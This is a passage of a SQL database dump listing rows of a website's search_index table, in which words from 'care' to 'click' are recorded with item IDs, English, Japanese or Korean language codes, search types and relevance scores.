('care', 24, 'en', 'node_search', 1.65754),
('care', 24, 'ko', 'node_search', 0.738408),
('care', 27, 'en', 'node_search', 1.62503),
('care', 77, 'en', 'node_search', 4),
('care', 136, 'en', 'node_search', 1),
('care', 162, 'en', 'node_search', 35),
('career', 155, 'en', 'node_search', 1),
('career', 156, 'en', 'node_search', 2),
('career', 160, 'en', 'node_search', 5),
('career', 161, 'en', 'node_search', 2),
('career', 162, 'en', 'node_search', 2.91323),
('career', 164, 'en', 'node_search', 29),
('career', 165, 'en', 'node_search', 2),
('career', 166, 'en', 'node_search', 2),
('career', 167, 'en', 'node_search', 1),
('career', 168, 'en', 'node_search', 2),
('career', 170, 'en', 'node_search', 2),
('career', 171, 'en', 'node_search', 29),
('career', 173, 'en', 'node_search', 1),
('career', 174, 'en', 'node_search', 2),
('career', 175, 'en', 'node_search', 2),
('career', 177, 'en', 'node_search', 1),
('career', 178, 'en', 'node_search', 29),
('career', 179, 'en', 'node_search', 1),
('career', 180, 'en', 'node_search', 2),
('career', 181, 'en', 'node_search', 1),
('career', 182, 'en', 'node_search', 1),
('career', 185, 'en', 'node_search', 2),
('career', 186, 'en', 'node_search', 29),
('career', 187, 'en', 'node_search', 2),
('career', 188, 'en', 'node_search', 2),
('career', 189, 'en', 'node_search', 2),
('career', 190, 'en', 'node_search', 1),
('career', 192, 'en', 'node_search', 2),
('career', 194, 'en', 'node_search', 1),
('career', 196, 'en', 'node_search', 1),
('career', 198, 'en', 'node_search', 30),
('careers', 154, 'en', 'node_search', 1),
('careers', 157, 'en', 'node_search', 2),
('careers', 165, 'en', 'node_search', 1),
('careers', 169, 'en', 'node_search', 1),
('careers', 173, 'en', 'node_search', 28),
('careers', 175, 'en', 'node_search', 1),
('careers', 184, 'en', 'node_search', 1),
('careful', 175, 'en', 'node_search', 1),
('careful', 185, 'en', 'node_search', 1),
('careful', 186, 'en', 'node_search', 1),
('careful', 192, 'en', 'node_search', 1),
('careful', 199, 'en', 'node_search', 1),
('carefully', 28, 'en', 'help_search', 0.833529),
('carefully', 28, 'ja', 'help_search', 0.833529),
('carefully', 28, 'ko', 'help_search', 0.833529),
('carefully', 87, 'en', 'node_search', 3),
('caregiver', 154, 'en', 'node_search', 27),
('caregiver', 162, 'en', 'node_search', 27),
('caregiver', 165, 'en', 'node_search', 27),
('caregiver', 169, 'en', 'node_search', 27),
('caregiver', 171, 'en', 'node_search', 27),
('caregiver', 188, 'en', 'node_search', 27),
('caregivers', 162, 'en', 'node_search', 1),
('caregiving', 162, 'en', 'node_search', 0.896076),
('caregiving', 165, 'en', 'node_search', 1),
('caregiving', 169, 'en', 'node_search', 1),
('caregiving', 170, 'en', 'node_search', 6),
('caregiving', 171, 'en', 'node_search', 1),
('caregiving', 178, 'en', 'node_search', 29),
('caregiving', 188, 'en', 'node_search', 2),
('caregiving', 189, 'en', 'node_search', 1),
('careless', 87, 'en', 'node_search', 1),
('carried', 27, 'en', 'node_search', 1),
('carry', 23, 'en', 'node_search', 1),
('categories', 7, 'en', 'node_search', 2),
('categories', 7, 'ko', 'node_search', 2),
('categorize', 80, 'en', 'help_search', 1),
('categorize', 80, 'ja', 'help_search', 1),
('categorize', 80, 'ko', 'help_search', 1),
('cause', 3, 'en', 'node_search', 1),
('cause', 3, 'ko', 'node_search', 1),
('celebrate', 120, 'en', 'node_search', 49),
('celebrate', 120, 'ja', 'node_search', 27),
('celebrate', 183, 'en', 'node_search', 1),
('celebrate', 186, 'en', 'node_search', 1),
('celebrate', 197, 'en', 'node_search', 1),
('celebrating', 180, 'en', 'node_search', 4),
('celebrating', 182, 'en', 'node_search', 4),
('center', 24, 'en', 'node_search', 1.61093),
('center', 24, 'ja', 'node_search', 0.899978),
('center', 24, 'ko', 'node_search', 0.810915),
('center', 28, 'en', 'node_search', 29),
('center', 28, 'ja', 'node_search', 29),
('center', 28, 'ko', 'node_search', 29),
('center', 29, 'en', 'node_search', 3),
('center', 29, 'ja', 'node_search', 28),
('center', 29, 'ko', 'node_search', 28),
('center', 31, 'en', 'node_search', 1),
('center', 62, 'en', 'node_search', 1.83645),
('center', 155, 'en', 'node_search', 1),
('center', 181, 'en', 'node_search', 3),
('center', 182, 'en', 'node_search', 3),
('center', 183, 'en', 'node_search', 3),
('centers', 136, 'en', 'node_search', 1),
('centre', 142, 'en', 'node_search', 46),
('centre', 142, 'ja', 'node_search', 27),
('certain', 42, 'en', 'help_search', 1),
('certain', 42, 'ja', 'help_search', 1),
('certain', 42, 'ko', 'help_search', 1),
('certain', 84, 'en', 'help_search', 1),
('certain', 84, 'ja', 'help_search', 1),
('certain', 84, 'ko', 'help_search', 1),
('certificate', 4, 'en', 'node_search', 1),
('certificate', 4, 'ja', 'node_search', 1),
('certificate', 162, 'en', 'node_search', 2.84768),
('certificates', 62, 'en', 'node_search', 1),
('certification', 183, 'en', 'node_search', 1),
('challenge', 42, 'en', 'help_search', 1),
('challenge', 42, 'ja', 'help_search', 1),
('challenge', 42, 'ko', 'help_search', 1),
('challenge', 62, 'en', 'node_search', 0.909743),
('challenges', 136, 'en', 'node_search', 1),
('challenges', 138, 'en', 'node_search', 1),
('challenges', 180, 'en', 'node_search', 1),
('challenges', 199, 'en', 'node_search', 1),
('chan', 109, 'en', 'node_search', 28),
('chan', 109, 'ja', 'node_search', 31),
('chance', 66, 'en', 'node_search', 1),
('chang', 72, 'en', 'node_search', 1),
('chang', 72, 'ja', 'node_search', 1),
('chang', 110, 'en', 'node_search', 28),
('chang', 110, 'ja', 'node_search', 31),
('change', 1, 'en', 'help_search', 4),
('change', 1, 'ja', 'help_search', 4),
('change', 1, 'ko', 'help_search', 4),
('change', 3, 'en', 'node_search', 1),
('change', 3, 'ko', 'node_search', 1),
('change', 5, 'en', 'help_search', 1),
('change', 5, 'ja', 'help_search', 1),
('change', 5, 'ko', 'help_search', 1),
('change', 7, 'en', 'help_search', 1),
('change', 7, 'ja', 'help_search', 1),
('change', 7, 'ko', 'help_search', 1),
('change', 10, 'en', 'help_search', 1),
('change', 10, 'ja', 'help_search', 1),
('change', 10, 'ko', 'help_search', 1),
('change', 17, 'en', 'help_search', 2),
('change', 17, 'ja', 'help_search', 2),
('change', 17, 'ko', 'help_search', 2),
('change', 20, 'en', 'help_search', 1),
('change', 20, 'ja', 'help_search', 1),
('change', 20, 'ko', 'help_search', 1),
('change', 25, 'ja', 'help_search', 1),
('change', 26, 'en', 'help_search', 1),
('change', 26, 'ja', 'help_search', 1),
('change', 26, 'ko', 'help_search', 1),
('change', 29, 'en', 'help_search', 1.96621);
INSERT INTO `search_index` (`word`, `sid`, `langcode`, `type`, `score`) VALUES
('change', 29, 'ja', 'help_search', 1.96621),
('change', 29, 'ko', 'help_search', 1.96621),
('change', 31, 'en', 'node_search', 1),
('change', 48, 'en', 'help_search', 1),
('change', 48, 'ja', 'help_search', 1),
('change', 48, 'ko', 'help_search', 1),
('change', 50, 'en', 'help_search', 0.993146),
('change', 50, 'ja', 'help_search', 0.993146),
('change', 50, 'ko', 'help_search', 0.993146),
('change', 58, 'en', 'help_search', 1),
('change', 58, 'ja', 'help_search', 1),
('change', 58, 'ko', 'help_search', 1),
('change', 59, 'en', 'help_search', 1),
('change', 59, 'ja', 'help_search', 1),
('change', 59, 'ko', 'help_search', 1),
('change', 61, 'en', 'help_search', 1.98493),
('change', 61, 'ja', 'help_search', 1.98493),
('change', 61, 'ko', 'help_search', 1.98493),
('change', 64, 'en', 'help_search', 2),
('change', 64, 'ja', 'help_search', 2),
('change', 64, 'ko', 'help_search', 2),
('change', 69, 'en', 'help_search', 0.96498),
('change', 69, 'ja', 'help_search', 0.96498),
('change', 69, 'ko', 'help_search', 0.96498),
('change', 73, 'en', 'help_search', 1),
('change', 73, 'ja', 'help_search', 1),
('change', 73, 'ko', 'help_search', 1),
('change', 82, 'en', 'help_search', 1),
('change', 82, 'ja', 'help_search', 1),
('change', 82, 'ko', 'help_search', 1),
('change', 83, 'en', 'help_search', 1),
('change', 83, 'ja', 'help_search', 1),
('change', 83, 'ko', 'help_search', 1),
('change', 91, 'en', 'help_search', 5),
('change', 91, 'ja', 'help_search', 5),
('change', 91, 'ko', 'help_search', 5),
('changed', 7, 'en', 'help_search', 1),
('changed', 7, 'ja', 'help_search', 1),
('changed', 7, 'ko', 'help_search', 1),
('changed', 67, 'en', 'help_search', 0.938382),
('changed', 67, 'ja', 'help_search', 0.938382),
('changed', 67, 'ko', 'help_search', 0.938382),
('changed', 70, 'en', 'help_search', 1),
('changed', 70, 'ja', 'help_search', 1),
('changed', 70, 'ko', 'help_search', 1),
('changed', 71, 'en', 'help_search', 1),
('changed', 71, 'ja', 'help_search', 1),
('changed', 71, 'ko', 'help_search', 1),
('changed', 77, 'en', 'help_search', 2),
('changed', 77, 'ja', 'help_search', 2),
('changed', 77, 'ko', 'help_search', 2),
('changed', 90, 'en', 'help_search', 2),
('changed', 90, 'ja', 'help_search', 2),
('changed', 90, 'ko', 'help_search', 2),
('changed', 93, 'en', 'help_search', 1),
('changed', 93, 'ja', 'help_search', 1),
('changed', 93, 'ko', 'help_search', 1),
('changes', 6, 'en', 'help_search', 2),
('changes', 6, 'ja', 'help_search', 2),
('changes', 6, 'ko', 'help_search', 2),
('changes', 14, 'en', 'help_search', 1),
('changes', 14, 'ja', 'help_search', 1),
('changes', 14, 'ko', 'help_search', 1),
('changes', 25, 'ja', 'help_search', 1),
('changes', 26, 'en', 'help_search', 1),
('changes', 26, 'ja', 'help_search', 1),
('changes', 26, 'ko', 'help_search', 1),
('changes', 30, 'en', 'help_search', 2),
('changes', 30, 'ja', 'help_search', 2),
('changes', 30, 'ko', 'help_search', 2),
('changes', 37, 'en', 'help_search', 1.94209),
('changes', 37, 'ja', 'help_search', 1.94209),
('changes', 37, 'ko', 'help_search', 1.94209),
('changes', 58, 'en', 'help_search', 1),
('changes', 58, 'ja', 'help_search', 1),
('changes', 58, 'ko', 'help_search', 1),
('changes', 64, 'en', 'help_search', 1),
('changes', 64, 'ja', 'help_search', 1),
('changes', 64, 'ko', 'help_search', 1),
('changes', 91, 'en', 'help_search', 0.98493),
('changes', 91, 'ja', 'help_search', 0.980874),
('changes', 91, 'ko', 'help_search', 0.98493),
('changes', 92, 'en', 'help_search', 0.997306),
('changes', 92, 'ja', 'help_search', 0.997306),
('changes', 92, 'ko', 'help_search', 0.997306),
('changing', 29, 'en', 'help_search', 45),
('changing', 29, 'ja', 'help_search', 45),
('changing', 29, 'ko', 'help_search', 45),
('changing', 71, 'en', 'help_search', 26),
('changing', 71, 'ja', 'help_search', 26),
('changing', 71, 'ko', 'help_search', 26),
('changing', 91, 'en', 'help_search', 1),
('changing', 91, 'ja', 'help_search', 1),
('changing', 91, 'ko', 'help_search', 1),
('chanyaw', 72, 'ja', 'node_search', 1),
('chapter', 31, 'en', 'node_search', 0.848323),
('chapter', 164, 'en', 'node_search', 4),
('chapter', 166, 'en', 'node_search', 1),
('chapter', 169, 'en', 'node_search', 1),
('chapter', 171, 'en', 'node_search', 1),
('chapter', 174, 'en', 'node_search', 1),
('chapter', 175, 'en', 'node_search', 1),
('chapter', 176, 'en', 'node_search', 1),
('chapter', 177, 'en', 'node_search', 28),
('character', 63, 'en', 'help_search', 1),
('character', 63, 'ja', 'help_search', 1),
('character', 63, 'ko', 'help_search', 1),
('characters', 62, 'en', 'node_search', 1),
('charge', 29, 'en', 'node_search', 28),
('charity', 27, 'en', 'node_search', 0.927431),
('chaw', 90, 'en', 'node_search', 28),
('chaw', 90, 'ja', 'node_search', 28),
('chaw', 146, 'en', 'node_search', 29),
('chaw', 146, 'ja', 'node_search', 1),
('check', 1, 'en', 'help_search', 2),
('check', 1, 'ja', 'help_search', 2),
('check', 1, 'ko', 'help_search', 2),
('check', 6, 'en', 'node_search', 3),
('check', 18, 'en', 'help_search', 1),
('check', 18, 'ja', 'help_search', 1),
('check', 18, 'ko', 'help_search', 1),
('check', 21, 'en', 'help_search', 1),
('check', 21, 'ja', 'help_search', 1),
('check', 21, 'ko', 'help_search', 1),
('check', 27, 'en', 'help_search', 1),
('check', 27, 'ja', 'help_search', 1),
('check', 27, 'ko', 'help_search', 1),
('check', 28, 'en', 'help_search', 1.74863),
('check', 28, 'ja', 'help_search', 1.74863),
('check', 28, 'ko', 'help_search', 1.74863),
('check', 45, 'en', 'help_search', 1),
('check', 45, 'ja', 'help_search', 1),
('check', 45, 'ko', 'help_search', 1),
('check', 50, 'en', 'help_search', 1),
('check', 50, 'ja', 'help_search', 1),
('check', 50, 'ko', 'help_search', 1),
('check', 51, 'en', 'help_search', 1),
('check', 51, 'ja', 'help_search', 1),
('check', 51, 'ko', 'help_search', 1),
('check', 53, 'en', 'help_search', 5),
('check', 53, 'ja', 'help_search', 5),
('check', 53, 'ko', 'help_search', 5),
('check', 55, 'en', 'help_search', 1),
('check', 55, 'ja', 'help_search', 1),
('check', 55, 'ko', 'help_search', 1),
('check', 56, 'en', 'help_search', 1),
('check', 56, 'ja', 'help_search', 1),
('check', 56, 'ko', 'help_search', 1),
('check', 58, 'en', 'help_search', 1),
('check', 58, 'ja', 'help_search', 1),
('check', 58, 'ko', 'help_search', 1),
('check', 61, 'en', 'help_search', 1),
('check', 61, 'ja', 'help_search', 1),
('check', 61, 'ko', 'help_search', 1),
('check', 67, 'en', 'help_search', 1),
('check', 67, 'ja', 'help_search', 1),
('check', 67, 'ko', 'help_search', 1),
('check', 73, 'en', 'help_search', 1),
('check', 73, 'ja', 'help_search', 1),
('check', 73, 'ko', 'help_search', 1),
('check', 74, 'en', 'help_search', 2),
('check', 74, 'ja', 'help_search', 2),
('check', 74, 'ko', 'help_search', 2),
('check', 75, 'en', 'help_search', 1),
('check', 75, 'ja', 'help_search', 1),
('check', 75, 'ko', 'help_search', 1),
('check', 76, 'en', 'help_search', 4),
('check', 76, 'ja', 'help_search', 4),
('check', 76, 'ko', 'help_search', 4),
('check', 82, 'en', 'help_search', 1),
('check', 82, 'ja', 'help_search', 1),
('check', 82, 'ko', 'help_search', 1),
('check', 85, 'en', 'help_search', 1),
('check', 85, 'ja', 'help_search', 1),
('check', 85, 'ko', 'help_search', 1),
('check', 86, 'en', 'help_search', 1),
('check', 86, 'ja', 'help_search', 1),
('check', 86, 'ko', 'help_search', 1),
('check', 89, 'en', 'help_search', 1),
('check', 89, 'ja', 'help_search', 1),
('check', 89, 'ko', 'help_search', 1),
('check', 92, 'en', 'help_search', 4),
('check', 92, 'ja', 'help_search', 4),
('check', 92, 'ko', 'help_search', 4),
('checkbox', 1, 'en', 'help_search', 1),
('checkbox', 1, 'ja', 'help_search', 1),
('checkbox', 1, 'ko', 'help_search', 1),
('checkbox', 74, 'en', 'help_search', 1),
('checkbox', 74, 'ja', 'help_search', 1),
('checkbox', 74, 'ko', 'help_search', 1),
('checked', 56, 'en', 'help_search', 1),
('checked', 56, 'ja', 'help_search', 1),
('checked', 56, 'ko', 'help_search', 1),
('checked', 59, 'en', 'help_search', 1),
('checked', 59, 'ja', 'help_search', 1),
('checked', 59, 'ko', 'help_search', 1),
('checked', 76, 'en', 'help_search', 4),
('checked', 76, 'ja', 'help_search', 4),
('checked', 76, 'ko', 'help_search', 4),
('checked', 82, 'en', 'help_search', 1),
('checked', 82, 'ja', 'help_search', 1),
('checked', 82, 'ko', 'help_search', 1),
('checked', 92, 'en', 'help_search', 2),
('checked', 92, 'ja', 'help_search', 2),
('checked', 92, 'ko', 'help_search', 2),
('checking', 10, 'en', 'help_search', 2),
('checking', 10, 'ja', 'help_search', 2),
('checking', 10, 'ko', 'help_search', 2),
('checking', 53, 'en', 'help_search', 26),
('checking', 53, 'ja', 'help_search', 26),
('checking', 53, 'ko', 'help_search', 26),
('cherish', 69, 'en', 'node_search', 1),
('child', 56, 'en', 'help_search', 1),
('child', 56, 'ja', 'help_search', 1),
('child', 56, 'ko', 'help_search', 1),
('children', 56, 'en', 'help_search', 1),
('children', 56, 'ja', 'help_search', 1),
('children', 56, 'ko', 'help_search', 1),
('children', 67, 'ja', 'node_search', 3),
('children', 126, 'en', 'node_search', 1),
('children', 140, 'en', 'node_search', 2),
('childrenit', 135, 'en', 'node_search', 1),
('chinese', 67, 'en', 'help_search', 1),
('chinese', 67, 'ja', 'help_search', 1),
('chinese', 67, 'ko', 'help_search', 1),
('chit', 75, 'en', 'node_search', 28),
('chit', 75, 'ja', 'node_search', 27),
('chit', 90, 'en', 'node_search', 27),
('chit', 90, 'ja', 'node_search', 27),
('chitt', 75, 'ja', 'node_search', 1),
('cho', 154, 'en', 'node_search', 1),
('cho', 154, 'ja', 'node_search', 1),
('choice', 74, 'en', 'help_search', 1),
('choice', 74, 'ja', 'help_search', 1),
('choice', 74, 'ko', 'help_search', 1),
('choice', 79, 'en', 'help_search', 1),
('choice', 79, 'ja', 'help_search', 1),
('choice', 79, 'ko', 'help_search', 1),
('choices', 27, 'en', 'help_search', 2),
('choices', 27, 'ja', 'help_search', 2),
('choices', 27, 'ko', 'help_search', 2),
('choose', 7, 'en', 'help_search', 1),
('choose', 7, 'ja', 'help_search', 1),
('choose', 7, 'ko', 'help_search', 1),
('choose', 25, 'en', 'node_search', 1),
('choose', 25, 'ja', 'help_search', 1),
('choose', 27, 'en', 'help_search', 2),
('choose', 27, 'ja', 'help_search', 2),
('choose', 27, 'ko', 'help_search', 2),
('choose', 28, 'en', 'help_search', 1.83353),
('choose', 28, 'ja', 'help_search', 1.83353),
('choose', 28, 'ko', 'help_search', 1.83353),
('choose', 45, 'en', 'help_search', 1),
('choose', 45, 'ja', 'help_search', 1),
('choose', 45, 'ko', 'help_search', 1),
('choose', 48, 'en', 'help_search', 2),
('choose', 48, 'ja', 'help_search', 2),
('choose', 48, 'ko', 'help_search', 2),
('choose', 57, 'en', 'help_search', 1),
('choose', 57, 'ja', 'help_search', 1),
('choose', 57, 'ko', 'help_search', 1),
('choose', 66, 'en', 'node_search', 4),
('choose', 77, 'en', 'help_search', 1),
('choose', 77, 'ja', 'help_search', 1),
('choose', 77, 'ko', 'help_search', 1),
('choose', 79, 'en', 'help_search', 1),
('choose', 79, 'ja', 'help_search', 1),
('choose', 79, 'ko', 'help_search', 1),
('choose', 87, 'en', 'node_search', 1),
('choose', 93, 'en', 'help_search', 2),
('choose', 93, 'ja', 'help_search', 2),
('choose', 93, 'ko', 'help_search', 2),
('choosing', 23, 'en', 'help_search', 1),
('choosing', 23, 'ja', 'help_search', 1),
('choosing', 23, 'ko', 'help_search', 1),
('choosing', 42, 'en', 'help_search', 1),
('choosing', 42, 'ja', 'help_search', 1),
('choosing', 42, 'ko', 'help_search', 1),
('choosing', 93, 'en', 'help_search', 1),
('choosing', 93, 'ja', 'help_search', 1),
('choosing', 93, 'ko', 'help_search', 1),
('chose', 74, 'en', 'help_search', 2),
('chose', 74, 'ja', 'help_search', 2),
('chose', 74, 'ko', 'help_search', 2),
('chosen', 28, 'en', 'help_search', 1),
('chosen', 28, 'ja', 'help_search', 1),
('chosen', 28, 'ko', 'help_search', 1),
('chosen', 91, 'en', 'help_search', 1),
('chosen', 91, 'ja', 'help_search', 1),
('chosen', 91, 'ko', 'help_search', 1),
('choukai', 62, 'en', 'node_search', 1.77259),
('cicero', 204, 'en', 'node_search', 4),
('cicero', 204, 'ja', 'node_search', 4),
('cities', 24, 'en', 'node_search', 0.727213),
('cities', 27, 'en', 'node_search', 1),
('citizens', 24, 'en', 'node_search', 1),
('city', 68, 'en', 'node_search', 5),
('city', 68, 'ja', 'node_search', 1),
('city', 79, 'en', 'node_search', 1),
('city', 80, 'en', 'node_search', 1),
('city', 80, 'ja', 'node_search', 0.98493),
('city', 111, 'en', 'node_search', 1),
('city', 134, 'en', 'node_search', 1),
('city', 144, 'en', 'node_search', 1),
('city', 163, 'en', 'node_search', 2),
('civil', 24, 'en', 'node_search', 1),
('civil', 24, 'ja', 'node_search', 0.66666),
('civil', 24, 'ko', 'node_search', 1),
('cjk', 67, 'en', 'help_search', 3.97258),
('cjk', 67, 'ja', 'help_search', 3.97258),
('cjk', 67, 'ko', 'help_search', 3.97258),
('ckeditor', 23, 'en', 'help_search', 13.1162),
('ckeditor', 23, 'ja', 'help_search', 13.1162),
('ckeditor', 23, 'ko', 'help_search', 13.1162),
('claro', 45, 'en', 'help_search', 1),
('claro', 45, 'ja', 'help_search', 1),
('claro', 45, 'ko', 'help_search', 1),
('claro', 46, 'en', 'help_search', 0.989021),
('claro', 46, 'ja', 'help_search', 0.989021),
('claro', 46, 'ko', 'help_search', 0.989021),
('claro', 69, 'en', 'help_search', 1),
('claro', 69, 'ja', 'help_search', 1),
('claro', 69, 'ko', 'help_search', 1),
('class', 3, 'en', 'node_search', 43),
('class', 3, 'ko', 'node_search', 43),
('class', 24, 'en', 'node_search', 1.56463),
('class', 62, 'en', 'node_search', 11.424),
('class', 66, 'en', 'node_search', 10),
('class', 98, 'en', 'node_search', 28),
('class', 98, 'ja', 'node_search', 27),
('class', 133, 'en', 'node_search', 47),
('class', 133, 'ja', 'node_search', 27),
('class', 136, 'en', 'node_search', 46),
('class', 136, 'ja', 'node_search', 27),
('class', 138, 'en', 'node_search', 46),
('class', 138, 'ja', 'node_search', 27),
('class', 140, 'en', 'node_search', 46),
('class', 140, 'ja', 'node_search', 27),
('class', 142, 'en', 'node_search', 1),
('class', 155, 'en', 'node_search', 35),
('classes', 24, 'en', 'node_search', 0.742984),
('classes', 62, 'en', 'node_search', 4),
('classes', 66, 'en', 'node_search', 1),
('classes', 133, 'en', 'node_search', 1),
('classes', 138, 'en', 'node_search', 1),
('classes', 140, 'en', 'node_search', 1),
('classes', 142, 'en', 'node_search', 1),
('classified', 80, 'en', 'help_search', 0.961087),
('classified', 80, 'ja', 'help_search', 0.961087),
('classified', 80, 'ko', 'help_search', 0.961087),
('classify', 80, 'en', 'help_search', 4.99731),
('classify', 80, 'ja', 'help_search', 4.99731),
('classify', 80, 'ko', 'help_search', 4.99731),
('classify', 84, 'en', 'help_search', 1),
('classify', 84, 'ja', 'help_search', 1),
('classify', 84, 'ko', 'help_search', 1),
('classroom', 27, 'en', 'node_search', 1),
('classroom', 66, 'en', 'node_search', 0.953396),
('clean', 23, 'en', 'help_search', 1),
('clean', 23, 'ja', 'help_search', 1),
('clean', 23, 'ko', 'help_search', 1),
('clear', 34, 'en', 'help_search', 1),
('clear', 34, 'ja', 'help_search', 1),
('clear', 34, 'ko', 'help_search', 1),
('clear', 70, 'en', 'help_search', 11),
('clear', 70, 'ja', 'help_search', 11),
('clear', 70, 'ko', 'help_search', 11),
('clear', 73, 'en', 'help_search', 1),
('clear', 73, 'ja', 'help_search', 1),
('clear', 73, 'ko', 'help_search', 1),
('clear', 87, 'en', 'node_search', 1),
('clear', 186, 'en', 'node_search', 1),
('cleared', 70, 'en', 'help_search', 1),
('cleared', 70, 'ja', 'help_search', 1),
('cleared', 70, 'ko', 'help_search', 1),
('clearing', 45, 'en', 'help_search', 1),
('clearing', 45, 'ja', 'help_search', 1),
('clearing', 45, 'ko', 'help_search', 1),
('clearing', 70, 'en', 'help_search', 26),
('clearing', 70, 'ja', 'help_search', 26),
('clearing', 70, 'ko', 'help_search', 26),
('clearing', 73, 'en', 'help_search', 1),
('clearing', 73, 'ja', 'help_search', 1),
('clearing', 73, 'ko', 'help_search', 1),
('cli', 30, 'en', 'help_search', 0.725015),
('cli', 30, 'ja', 'help_search', 0.725015),
('cli', 30, 'ko', 'help_search', 0.725015),
('click', 1, 'en', 'help_search', 5),
('click', 1, 'ja', 'help_search', 5),
('click', 1, 'ko', 'help_search', 5),
('click', 3, 'en', 'help_search', 5),
('click', 3, 'ja', 'help_search', 5),
('click', 3, 'ko', 'help_search', 5),
('click', 4, 'en', 'help_search', 3),
('click', 4, 'ja', 'help_search', 3),
('click', 4, 'ko', 'help_search', 3),
('click', 5, 'en', 'help_search', 4),
('click', 5, 'ja', 'help_search', 4),
('click', 5, 'ko', 'help_search', 4),
('click', 8, 'en', 'help_search', 2),
('click', 8, 'ja', 'help_search', 2),
('click', 8, 'ko', 'help_search', 2),
('click', 10, 'en', 'help_search', 3),
('click', 10, 'ja', 'help_search', 3),
('click', 10, 'ko', 'help_search', 3),
('click', 12, 'en', 'help_search', 1),
('click', 12, 'ja', 'help_search', 1),
('click', 12, 'ko', 'help_search', 1),
('click', 14, 'en', 'help_search', 2),
('click', 14, 'ja', 'help_search', 2),
('click', 14, 'ko', 'help_search', 2),
('click', 15, 'en', 'help_search', 1),
('click', 15, 'ja', 'help_search', 1),
('click', 15, 'ko', 'help_search', 1),
('click', 16, 'en', 'help_search', 2),
('click', 16, 'ja', 'help_search', 2),
('click', 16, 'ko', 'help_search', 2),
('click', 17, 'en', 'help_search', 2),
('click', 17, 'ja', 'help_search', 2),
('click', 17, 'ko', 'help_search', 2),
('click', 18, 'en', 'help_search', 2),
('click', 18, 'ja', 'help_search', 2),
('click', 18, 'ko', 'help_search', 2),
('click', 19, 'en', 'help_search', 2),
('click', 19, 'ja', 'help_search', 2),
('click', 19, 'ko', 'help_search', 2),
('click', 21, 'en', 'help_search', 2),
('click', 21, 'ja', 'help_search', 2),
('click', 21, 'ko', 'help_search', 2),
('click', 22, 'en', 'help_search', 2.98633),
('click', 22, 'ja', 'help_search', 2.98633),
('click', 22, 'ko', 'help_search', 2.98633),
('click', 24, 'en', 'help_search', 5),
('click', 24, 'ja', 'help_search', 5),
('click', 24, 'ko', 'help_search', 5),
('click', 25, 'en', 'help_search', 3),
('click', 25, 'ja', 'help_search', 3),
('click', 26, 'en', 'help_search', 3),
('click', 26, 'ja', 'help_search', 3),
('click', 26, 'ko', 'help_search', 3),
('click', 27, 'en', 'help_search', 5),
('click', 27, 'ja', 'help_search', 5),
('click', 27, 'ko', 'help_search', 5),
('click', 28, 'en', 'help_search', 1.71539),
('click', 28, 'ja', 'help_search', 1.71539),
('click', 28, 'ko', 'help_search', 1.71539),
('click', 32, 'en', 'help_search', 1.98087),
('click', 32, 'ja', 'help_search', 1.98087),
('click', 32, 'ko', 'help_search', 1.98087),
('click', 39, 'en', 'help_search', 3),
('click', 39, 'ja', 'help_search', 3),
('click', 39, 'ko', 'help_search', 3),
('click', 45, 'en', 'help_search', 2),
('click', 45, 'ja', 'help_search', 2),
('click', 45, 'ko', 'help_search', 2),
('click', 48, 'en', 'help_search', 5),
('click', 48, 'ja', 'help_search', 5),
('click', 48, 'ko', 'help_search', 5),
('click', 49, 'en', 'help_search', 3),
('click', 49, 'ja', 'help_search', 3),
('click', 49, 'ko', 'help_search', 3),
('click', 50, 'en', 'help_search', 1.96587),
('click', 50, 'ja', 'help_search', 1.96587),
('click', 50, 'ko', 'help_search', 1.96587),
('click', 51, 'en', 'help_search', 1),
('click', 51, 'ja', 'help_search', 1),
('click', 51, 'ko', 'help_search', 1),
('click', 52, 'en', 'help_search', 1),
('click', 52, 'ja', 'help_search', 1),
('click', 52, 'ko', 'help_search', 1),
('click', 53, 'en', 'help_search', 1),
('click', 53, 'ja', 'help_search', 1),
('click', 53, 'ko', 'help_search', 1),
('click', 54, 'en', 'help_search', 4),
('click', 54, 'ja', 'help_search', 4),
('click', 54, 'ko', 'help_search', 4),
('click', 55, 'en', 'help_search', 2),
('click', 55, 'ja', 'help_search', 2),
('click', 55, 'ko', 'help_search', 2),
('click', 56, 'en', 'help_search', 4),
('click', 56, 'ja', 'help_search', 4),
('click', 56, 'ko', 'help_search', 4),
('click', 57, 'en', 'help_search', 2),
('click', 57, 'ja', 'help_search', 2),
('click', 57, 'ko', 'help_search', 2),
('click', 58, 'en', 'help_search', 2),
('click', 58, 'ja', 'help_search', 2),
('click', 58, 'ko', 'help_search', 2),
('click', 59, 'en', 'help_search', 4),
('click', 59, 'ja', 'help_search', 4),
('click', 59, 'ko', 'help_search', 4),
('click', 60, 'en', 'help_search', 2),
('click', 60, 'ja', 'help_search', 2),
('click', 60, 'ko', 'help_search', 2),
('click', 61, 'en', 'help_search', 4.99315),
('click', 61, 'ja', 'help_search', 4.99315),
('click', 61, 'ko', 'help_search', 4.99315),
('click', 63, 'en', 'help_search', 1),
('click', 63, 'ja', 'help_search', 1),
('click', 63, 'ko', 'help_search', 1),
('click', 64, 'en', 'help_search', 2),
('click', 64, 'ja', 'help_search', 2),
('click', 64, 'ko', 'help_search', 2),
('click', 66, 'en', 'help_search', 4),
('click', 66, 'ja', 'help_search', 4),
('click', 67, 'en', 'help_search', 1.91473),
('click', 67, 'ja', 'help_search', 1.91473),
('click', 67, 'ko', 'help_search', 1.91473),
('click', 69, 'en', 'help_search', 3.94216),
('click', 69, 'ja', 'help_search', 3.94216),
('click', 69, 'ko', 'help_search', 3.94216),
('click', 70, 'en', 'help_search', 1),
('click', 70, 'ja', 'help_search', 1),
('click', 70, 'ko', 'help_search', 1),
('click', 71, 'en', 'help_search', 4),
('click', 71, 'ja', 'help_search', 4),
('click', 71, 'ko', 'help_search', 4),
('click', 72, 'en', 'help_search', 1.86836),
('click', 72, 'ja', 'help_search', 1.86836),
('click', 72, 'ko', 'help_search', 1.86836),
('click', 73, 'en', 'help_search', 2),
('click', 73, 'ja', 'help_search', 2),
('click', 73, 'ko', 'help_search', 2),
('click', 74, 'en', 'help_search', 1),
('click', 74, 'ja', 'help_search', 1),
('click', 74, 'ko', 'help_search', 1),
('click', 75, 'en', 'help_search', 2),
('click', 75, 'ja', 'help_search', 2),
('click', 75, 'ko', 'help_search', 2),
('click', 76, 'en', 'help_search', 1),
('click', 76, 'ja', 'help_search', 1),
('click', 76, 'ko', 'help_search', 1),
('click', 77, 'en', 'help_search', 3),
('click', 77, 'ja', 'help_search', 3),
('click', 77, 'ko', 'help_search', 3),
('click', 78, 'en', 'help_search', 1),
('click', 78, 'ja', 'help_search', 1),
('click', 78, 'ko', 'help_search', 1),
